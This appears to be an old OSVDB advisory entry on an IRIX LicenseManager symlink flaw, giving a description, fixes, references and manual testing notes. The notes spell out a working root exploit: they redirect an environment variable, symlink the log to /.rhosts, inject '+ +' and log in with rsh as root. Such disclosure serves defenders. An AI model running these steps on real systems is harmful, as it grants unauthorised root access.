IRIX LicenseManager LICENSEMGR_FILE_ROOT

1998-04-13T00:00:00
ID OSVDB:898
Type osvdb
Reporter Yuri Volobuev(volobuev@t1.chem.umn.edu)
Modified 1998-04-13T00:00:00

Description

Vulnerability Description

IRIX contains a flaw that may allow a malicious local user to manipulate arbitrary files on the system. The issue is due to the LicenseManager creating files insecurely. It is possible for a user to set an environment variable and use a symlink style attack, resulting in a loss of integrity.

Solution Description

Upgrade to version 6.4 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: prevent the execution of admintool.

chmod 400 /usr/bin/admintool

Also, Silicon Graphics, Inc. has released patches that address this vulnerability.

Short Description

IRIX contains a flaw that may allow a malicious local user to manipulate arbitrary files on the system. The issue is due to the LicenseManager creating files insecurely. It is possible for a user to set an environment variable and use a symlink style attack, resulting in a loss of integrity.

Manual Testing Notes

% mkdir -p /tmp/var/flexlm % setenv LICENSEMGR_FILE_ROOT /tmp % cd /tmp/var/flexlm % cat > license.dat

FLEXlm license file

FEATURE + + blah sgifd 1.00 01-jan-0 0 blah ^D % ln -s /.rhosts license.dat.log % LicenseManager &

Next click on Update, fill in the four fields with any information and click on Apply. LicenseManager will report an error. Ignore it and exit.

% cat /.rhosts

Checkpoint file /var/flexlm/license.dat Fri Nov 22 19:05:50 1996

FLEXlm license file

FEATURE + + blah sgifd 1.00 01-jan-0 0 blah

% rsh localhost -l root

References:

Vendor URL: http://www.sgi.com Vendor Specific Solution URL: ftp://ftp.sgi.com/support/Patches/ Vendor Specific Advisory URL ISS X-Force ID: 893 CVE-1999-0051 CIAC Advisory: i-045 CERT: CA-1997-01 Bugtraq ID: 73